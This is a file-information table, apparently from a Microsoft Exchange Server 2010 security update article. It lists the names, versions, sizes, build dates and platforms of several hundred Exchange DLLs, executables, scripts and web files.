\nMicrosoft.exchange.abproviders.ad.dll| 14.3.498.0| 41,936| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 14.3.498.0| 13,928| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.addressbook.service.exe| 14.3.498.0| 148,584| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 14.3.498.0| 42,384| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.airsync.dll1| 14.3.509.0| 1,176,552| 11-Nov-2020| 21:19| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 14.3.498.0| 62,648| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 14.3.498.0| 20,120| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 14.3.498.0| 14,736| 11-Nov-2020| 21:25| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 14.3.498.0| 37,792| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.approval.applications.dll| 14.3.498.0| 62,408| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.assistants.dll| 14.3.498.0| 226,488| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 14.3.498.0| 22,416| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 14.3.498.0| 12,736| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 14.3.498.0| 58,504| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.authorizationplugin.dll| 14.3.509.0| 71,664| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.authservicehostservicelet.dll| 14.3.498.0| 15,984| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.autodiscover.dll| 14.3.509.0| 275,440| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 14.3.498.0| 20,376| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.cabutility.dll| 14.3.498.0| 257,664| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 14.3.498.0| 15,304| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 14.3.498.0| 33,904| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.clients.common.dll| 14.3.498.0| 54,432| 11-Nov-2020| 21:24| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 14.3.498.0| 75,672| 11-Nov-2020| 21:24| x64 \nMicrosoft.exchange.clients.owa.dll| 14.3.509.0| 3,314,672| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.clients.security.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.clients.strings.dll| 14.3.498.0| 959,440| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.cluster.replay.dll| 14.3.509.0| 1,962,992| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 14.3.498.0| 94,160| 11-Nov-2020| 21:23| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 14.3.509.0| 177,640| 11-Nov-2020| 21:23| x64 \nMicrosoft.exchange.common.dll| 14.3.498.0| 103,584| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.common.il.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.common.processmanagermsg.dll| 14.3.498.0| 17,304| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.commonmsg.dll| 14.3.498.0| 22,120| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.compliance.dll| 14.3.509.0| 50,160| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 14.3.498.0| 50,336| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.configuration.delegatedauth.dll| 14.3.509.0| 54,256| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.configuration.objectmodel.dll| 14.3.509.0| 1,045,488| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 14.3.498.0| 29,080| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 14.3.498.0| 83,104| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 14.3.498.0| 175,048| 11-Nov-2020| 21:23| x64 \nMicrosoft.exchange.core.strings.dll| 14.3.498.0| 156,624| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 14.3.509.0| 422,880| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 14.3.498.0| 14,224| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.data.directory.dll| 14.3.498.0| 3,462,304| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 14.3.498.0| 76,904| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.data.dll| 14.3.509.0| 914,408| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.data.filedistributionservice.eventlog.dll| 14.3.498.0| 21,392| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.data.mapi.dll| 14.3.498.0| 213,968| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.providers.dll| 14.3.498.0| 177,096| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 14.3.498.0| 91,088| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.storage.dll| 14.3.509.0| 5,280,736| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 14.3.498.0| 21,608| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.data.throttlingservice.client.dll| 14.3.498.0| 46,032| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 14.3.498.0| 12,696| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 14.3.498.0| 12,904| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.datacenterstrings.dll| 14.3.498.0| 74,864| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.diagnostics.dll| 14.3.498.0| 820,176| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 14.3.498.0| 21,608| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.edgesync.common.dll| 14.3.498.0| 160,672| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 14.3.498.0| 226,408| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 14.3.498.0| 22,416| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 14.3.498.0| 107,624| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 14.3.498.0| 11,712| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 14.3.498.0| 46,184| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.extensibility.eventlog.dll| 14.3.498.0| 13,200| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.extensibility.internal.dll| 14.3.509.0| 439,280| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.groupmetrics.eventlog.dll| 14.3.498.0| 11,720| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.groupmetricsservicelet.dll| 14.3.509.0| 21,488| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 14.3.498.0| 54,224| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.helpprovider.dll| 14.3.498.0| 45,976| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 14.3.498.0| 16,832| 11-Nov-2020| 21:25| x64 \nMicrosoft.exchange.imap4.exe| 14.3.509.0| 218,080| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.imap4service.exe| 14.3.498.0| 21,920| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 14.3.498.0| 45,984| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.infoworker.common.dll| 14.3.509.0| 1,467,360| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll| 14.3.509.0| 16,864| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 14.3.498.0| 51,816| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 14.3.498.0| 123,808| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.instantmessaging.dll| 14.3.498.0| 62,624| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.irm.formprotector.dll| 14.3.498.0| 152,216| 11-Nov-2020| 21:25| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 14.3.498.0| 52,160| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 14.3.498.0| 46,528| 11-Nov-2020| 21:25| x64 \nMicrosoft.exchange.isam.esebcli.dll| 14.3.498.0| 88,480| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.isam.interop.dll| 14.3.498.0| 356,248| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.live.domainservices.dll| 14.3.498.0| 127,896| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 14.3.509.0| 570,352| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 14.3.498.0| 357,272| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 14.3.498.0| 23,488| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.mailboxreplicationservice.provider.dll| 14.3.498.0| 172,960| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 14.3.498.0| 119,704| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 14.3.509.0| 115,688| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.mailsubmission.eventlog.dll| 14.3.498.0| 15,256| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.management.controlpanel.dll| 14.3.509.0| 3,650,536| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 14.3.498.0| 27,544| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.management.detailstemplates.dll| 14.3.498.0| 82,896| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.management.dll| 14.3.509.0| 12,284,896| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.management.edge.systemmanager.dll| 14.3.498.0| 70,816| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.management.nativeresources.dll| 14.3.498.0| 201,104| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.management.powershell.support.dll| 14.3.509.0| 103,408| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.management.publicfolders.dll| 14.3.498.0| 144,336| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 14.3.509.0| 2,556,912| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.management.systemmanager.dll| 14.3.509.0| 1,274,848| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.managementgui.dll| 14.3.498.0| 5,412,000| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.managementmsg.dll| 14.3.498.0| 26,560| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.messagesecurity.dll| 14.3.498.0| 87,144| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 14.3.498.0| 16,320| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 14.3.498.0| 74,856| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 14.3.498.0| 20,632| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 14.3.498.0| 107,632| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 14.3.498.0| 25,192| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 14.3.498.0| 132,200| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 14.3.498.0| 173,168| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 14.3.498.0| 26,216| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.mobiledriver.dll| 14.3.498.0| 148,376| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.monitoring.eventlog.dll| 14.3.498.0| 11,928| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.monitoring.exe| 14.3.498.0| 66,464| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.net.dll| 14.3.509.0| 2,180,072| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.oabauthmodule.dll| 14.3.498.0| 18,840| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.oabmaintenance.eventlog.dll| 14.3.498.0| 13,768| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.oabmaintenanceservicelet.dll| 14.3.498.0| 50,072| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 14.3.498.0| 15,808| 11-Nov-2020| 21:25| x64 \nMicrosoft.exchange.pop3.exe| 14.3.498.0| 91,040| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.pop3service.exe| 14.3.498.0| 21,912| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.popimap.core.dll| 14.3.498.0| 152,480| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.powershell.configuration.dll| 14.3.498.0| 193,488| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 14.3.498.0| 74,704| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.protectedservicehost.exe| 14.3.498.0| 25,504| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.provisioningagent.dll| 14.3.509.0| 185,328| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.pst.dll| 14.3.498.0| 172,960| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.routingtablelogparser.dll| 14.3.509.0| 103,392| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.rpc.dll| 14.3.509.0| 866,800| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.rpcclientaccess.coexistence.dll| 14.3.498.0| 17,512| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.dll| 14.3.498.0| 119,912| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 14.3.498.0| 66,672| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 14.3.509.0| 431,088| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 14.3.498.0| 595,048| 11-Nov-2020| 21:24| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 14.3.498.0| 103,320| 11-Nov-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 14.3.498.0| 16,320| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 14.3.498.0| 83,056| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 14.3.509.0| 58,336| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 14.3.498.0| 21,952| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 14.3.498.0| 13,968| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 14.3.498.0| 20,072| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.search.exsearch.exe| 14.3.498.0| 410,576| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.search.exsearchmsg.dll| 14.3.498.0| 20,584| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.search.native.dll| 14.3.509.0| 131,568| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.security.dll| 14.3.509.0| 185,328| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 14.3.498.0| 13,256| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.servicehost.exe| 14.3.498.0| 28,776| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.services.dll| 14.3.509.0| 3,138,536| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.services.eventlogs.dll| 14.3.498.0| 25,536| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 14.3.509.0| 46,064| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.setup.common.dll| 14.3.498.0| 447,384| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.setup.exsetupuihelper.dll| 14.3.498.0| 209,824| 11-Nov-2020| 21:21| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 14.3.498.0| 67,480| 11-Nov-2020| 21:21| x64 \nMicrosoft.exchange.sqm.dll| 14.3.498.0| 58,320| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.storedriver.dll| 14.3.509.0| 549,856| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.storedriver.eventlog.dll| 14.3.498.0| 16,280| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.storeprovider.dll| 14.3.498.0| 853,104| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.structuredquery.dll| 14.3.498.0| 153,248| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 14.3.498.0| 70,760| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 14.3.498.0| 22,640| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.transport.agent.headerconversion.dll| 14.3.498.0| 19,560| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 14.3.509.0| 226,288| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 14.3.498.0| 17,008| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 14.3.498.0| 38,000| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 14.3.498.0| 58,472| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 14.3.498.0| 66,664| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 14.3.498.0| 50,080| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.dll| 14.3.498.0| 1,909,872| 11-Nov-2020| 21:19| x86 \nMicrosoft.exchange.transport.eventlog.dll| 14.3.498.0| 97,224| 11-Nov-2020| 21:19| x64 \nMicrosoft.exchange.transport.logging.search.dll| 14.3.498.0| 95,128| 11-Nov-2020| 21:22| x86 \nMicrosoft.exchange.transport.sync.common.dll| 14.3.498.0| 435,104| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 14.3.498.0| 11,712| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.transport.sync.worker.dll| 14.3.509.0| 1,065,968| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 14.3.498.0| 15,000| 11-Nov-2020| 21:20| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 14.3.498.0| 20,424| 11-Nov-2020| 21:22| x64 \nMicrosoft.exchange.um.clientstrings.dll| 14.3.498.0| 70,560| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.um.lad.dll| 14.3.498.0| 116,640| 11-Nov-2020| 21:23| x64 \nMicrosoft.exchange.um.prompts.dll| 14.3.498.0| 205,728| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 14.3.509.0| 95,216| 11-Nov-2020| 21:20| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 14.3.498.0| 181,152| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.um.umcommon.dll| 14.3.509.0| 758,768| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.um.umcore.dll| 14.3.509.0| 1,377,264| 11-Nov-2020| 21:23| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 14.3.498.0| 101,824| 11-Nov-2020| 21:20| x64 \nMicrosoft.managementgui.dll| 14.3.498.0| 148,648| 11-Nov-2020| 21:19| x86 \nMicrosoft.powershell.hostingtools.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:22| x86 \nMicrosoft.powershell.hostingtools_2.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:19| x86 \nMigbase.dll| 14.3.509.0| 776,600| 11-Nov-2020| 21:22| x64 \nMigmsg.dll| 14.3.498.0| 84,376| 11-Nov-2020| 21:20| x64 \nMigrateumcustomprompts.ps1| Not applicable| 19,130| 11-Nov-2020| 21:21| Not applicable \nMoveallreplicas.ps1| Not applicable| 15,215| 11-Nov-2020| 21:21| Not applicable \nMovemailbox.ps1| Not applicable| 61,148| 11-Nov-2020| 21:21| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,630| 11-Nov-2020| 21:21| Not applicable \nMsallog.dll| 14.3.498.0| 39,528| 11-Nov-2020| 21:20| x64 \nMsexchangeadtopologyservice.exe| 14.3.509.0| 106,904| 11-Nov-2020| 21:25| x64 \nMsexchangefds.exe| 14.3.509.0| 103,408| 11-Nov-2020| 21:19| x86 \nMsexchangelesearchworker.exe| 14.3.498.0| 82,848| 11-Nov-2020| 21:21| x86 \nMsexchangemailboxassistants.exe| 14.3.509.0| 795,624| 11-Nov-2020| 21:20| x86 \nMsexchangemailboxreplication.exe| 14.3.498.0| 20,384| 11-Nov-2020| 21:20| x86 \nMsexchangemailsubmission.exe| 14.3.498.0| 111,520| 11-Nov-2020| 21:20| x86 \nMsexchangerepl.exe| 14.3.498.0| 62,416| 11-Nov-2020| 21:20| x86 \nMsexchangethrottling.exe| 14.3.498.0| 41,936| 11-Nov-2020| 21:20| x86 \nMsexchangetransport.exe| 14.3.498.0| 74,648| 11-Nov-2020| 21:19| x86 \nMsexchangetransportlogsearch.exe| 14.3.498.0| 205,720| 11-Nov-2020| 21:22| x86 \nMsfte1.dll| 14.0.7177.5001| 3,228,440| 11-Nov-2020| 21:22| x64 \nMsgedt.js| Not applicable| 4,778| 11-Nov-2020| 21:20| Not applicable \nMsglst.js| Not applicable| 3,295| 11-Nov-2020| 21:20| Not applicable \nNewtestcasconnectivityuser.ps1| Not applicable| 22,292| 11-Nov-2020| 21:21| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 11-Nov-2020| 21:21| Not applicable \nNtspxgen.dll| 14.3.498.0| 80,272| 11-Nov-2020| 21:19| x64 \nOabgen.dll| 14.3.509.0| 349,592| 11-Nov-2020| 21:22| x64 \nOcemul.dll| 8.5.3.76| 54,112| 11-Nov-2020| 21:24| x64 \nOilink.dll| 8.5.3.76| 464,736| 11-Nov-2020| 21:24| x86 \nOilink.exe| 8.5.3.76| 317,280| 11-Nov-2020| 21:24| x64 \nOilink.jar| Not applicable| 1,425,202| 11-Nov-2020| 21:24| Not applicable \nOitnsf.id| Not applicable| 4,688| 11-Nov-2020| 21:24| Not applicable \nOit_font_metrics.db| Not applicable| 375,808| 11-Nov-2020| 21:24| Not applicable \nOleconverter.exe| 14.3.498.0| 155,536| 11-Nov-2020| 21:19| x64 \nOswin64.dll| 8.5.3.76| 103,272| 11-Nov-2020| 21:24| x64 \nOutsidein.dll| 8.5.3.76| 296,296| 11-Nov-2020| 21:24| x86 \nOwaauth.dll| 14.3.509.0| 97,688| 11-Nov-2020| 21:20| x64 \nOwasl.xap| Not applicable| 32,251| 11-Nov-2020| 21:20| Not applicable \nOwasmime.msi| Not applicable| 2,301,952| 11-Nov-2020| 21:19| Not applicable \nOwaspell.dll| 14.3.498.0| 43,416| 11-Nov-2020| 21:23| x64 \nPerfnm.h| Not applicable| 47,627| 11-Nov-2020| 21:25| Not applicable \nPerf_common_extrace.dll| 14.3.498.0| 163,432| 11-Nov-2020| 21:22| x64 \nPerf_exchmem.dll| 14.3.498.0| 64,408| 11-Nov-2020| 21:22| x64 \nPerf_mdbsz.dll| 14.3.509.0| 49,560| 11-Nov-2020| 21:25| x64 \nPolicytest.exe| 14.3.498.0| 44,440| 11-Nov-2020| 21:22| x64 \nPremium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 71,003| 11-Nov-2020| 21:21| Not applicable \nPrepare_moverequest.ps1| Not applicable| 71,218| 11-Nov-2020| 21:21| Not applicable \nPublishedstartpage.js| Not applicable| 15,353| 11-Nov-2020| 21:20| Not applicable \nQuietexe.exe| 14.3.498.0| 14,752| 11-Nov-2020| 21:21| x86 \nReadpost.aspx| Not applicable| 6,516| 11-Nov-2020| 21:23| Not applicable \nReadsharingmessage.ascx| Not applicable| 5,235| 11-Nov-2020| 21:23| Not applicable \nReadvoicemailmessage.aspx| Not applicable| 9,320| 11-Nov-2020| 21:23| Not applicable \nRedir.aspx| Not applicable| 1,714| 11-Nov-2020| 21:23| Not applicable \nRedistributeactivedatabases.ps1| Not applicable| 116,795| 11-Nov-2020| 21:21| Not applicable \nReenable_auditloggingagent.ps1| Not applicable| 14,567| 11-Nov-2020| 21:21| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 22,562| 11-Nov-2020| 21:21| Not applicable \nRemoteexchange.ps1| Not applicable| 21,607| 11-Nov-2020| 21:21| Not applicable \nRemovereplicafrompfrecursive.ps1| Not applicable| 16,051| 11-Nov-2020| 21:21| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 15,355| 11-Nov-2020| 21:21| Not applicable \nReplacereplicaonpfrecursive.ps1| Not applicable| 16,452| 11-Nov-2020| 21:21| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,715| 11-Nov-2020| 21:21| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,715| 11-Nov-2020| 21:21| Not applicable \nReplaycrimsonevents.man| Not applicable| 247,121| 11-Nov-2020| 21:23| Not applicable \nReplaycrimsonmsg.dll| 14.3.498.0| 259,744| 11-Nov-2020| 21:23| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,504| 11-Nov-2020| 21:21| Not applicable \nResetcasservice.ps1| Not applicable| 21,735| 11-Nov-2020| 21:21| Not applicable \nResetsearchindex.ps1| Not applicable| 16,817| 11-Nov-2020| 21:21| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,197| 11-Nov-2020| 21:23| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,534| 11-Nov-2020| 21:21| Not applicable \nRightsmanagementwrapper.dll| 14.3.498.0| 79,304| 11-Nov-2020| 21:23| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,460| 11-Nov-2020| 21:21| Not applicable \nRoutingview.exe| 14.3.509.0| 160,736| 11-Nov-2020| 21:22| x86 \nRulesauditmsg.dll| 14.3.498.0| 11,928| 11-Nov-2020| 21:23| x64 \nSccanno.dll| 8.5.3.76| 136,552| 11-Nov-2020| 21:24| x64 \nSccca.dll| 8.5.3.76| 46,944| 11-Nov-2020| 21:24| x64 \nSccch.dll| 8.5.3.76| 201,056| 11-Nov-2020| 21:24| x64 \nSccda.dll| 8.5.3.76| 151,904| 11-Nov-2020| 21:24| x64 \nSccdu.dll| 8.5.3.76| 617,824| 11-Nov-2020| 21:24| x64 \nSccex.dll| 8.5.3.76| 94,560| 11-Nov-2020| 21:24| x64 \nSccfa.dll| 8.5.3.76| 86,880| 11-Nov-2020| 21:24| x64 \nSccfi.dll| 8.5.3.76| 143,712| 11-Nov-2020| 21:24| x64 \nSccfmt.dll| 8.5.3.76| 75,616| 11-Nov-2020| 21:24| x64 \nSccfnt.dll| 8.5.3.76| 504,160| 11-Nov-2020| 21:24| x64 \nSccfut.dll| 8.5.3.76| 862,560| 11-Nov-2020| 21:24| x64 \nSccimg.dll| 8.5.3.76| 426,848| 11-Nov-2020| 21:24| x64 \nSccind.dll| 8.5.3.76| 68,960| 11-Nov-2020| 21:24| x64 \nScclo.dll| 8.5.3.76| 162,656| 11-Nov-2020| 21:24| x64 \nSccole2.dll| 8.5.3.76| 30,568| 11-Nov-2020| 21:24| x64 \nSccsd.dll| 8.5.3.76| 43,360| 11-Nov-2020| 21:24| x64 \nSccut.dll| 8.5.3.76| 2,001,248| 11-Nov-2020| 21:24| x64 \nSccxt.dll| 8.5.3.76| 54,624| 11-Nov-2020| 21:24| x64 \nServicecontrol.ps1| Not applicable| 48,237| 11-Nov-2020| 21:21| Not applicable \nSetup.com| 14.3.498.0| 444,928| 11-Nov-2020| 21:21| Not applicable \nSetup.exe| 14.3.498.0| 596,416| 11-Nov-2020| 21:21| x64 